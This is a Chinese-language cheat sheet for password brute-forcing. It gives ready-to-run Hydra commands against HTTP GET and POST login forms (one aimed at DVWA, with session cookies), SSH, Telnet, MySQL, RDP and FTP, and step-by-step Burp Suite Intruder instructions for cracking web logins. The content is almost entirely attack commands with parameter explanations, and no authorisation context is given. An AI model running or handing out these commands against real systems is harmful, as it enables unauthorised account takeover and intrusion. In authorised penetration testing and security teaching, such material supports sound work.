http登入破解get方式
hydra -l admin -P example_dict.txt 192.168.199.100 http-get-form
"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=username and/or password incorrect:H=Cookie: security=low; csrftoken=0xSI6WtQRzBPcAM29izgEMla5w2LYg8b93QwUVV1qLMfEkqhLd8p7QLKjlWaul4K; PHPSESSID=1jhm6bephuq5ikjg2jv8shp0o2"
-vV -f -t 16 -o test_get.txt
参数说明:
-l 用户名
-P 密码字典文件
192.168.199.100 目标
http-get-form 服务名
-t 线程
^USER^ ^PASS^ 载荷,对应用户和密码
:F 失败信息
:H 请求头
-o 保存结果到文件
: 把每个部分用:分开
http登入破解post方式
命令实例
hydra -l admin -P example_dict.txt 192.168.1.11 http-post-form "/Login.aspx
:表单数据xxx
&UserName=^USER^
&ImageButton1.x=19&ImageButton1.y=17
&UserPwd=^pass^:F=UserName and/or UserPwd incorrect"
-vV -f -t 16 -I
参数说明
-l 用户名
-P 密码字典文件
192.168.1.11 目标
http-post-form 服务名
-t 线程
^USER^ ^PASS^ 载荷
:F 失败信息
-o 保存结果到文件
: 把参数提交部分用:分开
-vV 显示详细信息
-f 爆出一个则停止
运行结果
ssh爆破
hydra -L user.txt -P example_dict.txt -t 4 192.168.199.136 ssh
Telnet爆破
hydra -L user.txt -P example_dict.txt 192.168.199.136 telnet
mysql爆破
hydra -l root -P example_dict.txt 192.168.1.188 mysql
rdp爆破
hydra -l administrator -P example_dict.txt 192.168.1.188 rdp
远程桌面爆破
burpsuite爆破web登入
- 开启burpsuite代理
intercept is on
浏览器代理选项填写对应ip和端口
-
浏览器访问,点击登录
先填写好表单数据,最后点击登录 -
进入爆破页面
-
爆破字段
先clear
在选择对应爆破字段
再add
-
选择字典
-
开始攻击,查看结果
攻击完后,选择length不一样的payload,尝试用该密码结果登录。
Ftp爆破
hydra -L user.txt -P example_dict.txt 192.168.199.136 ftp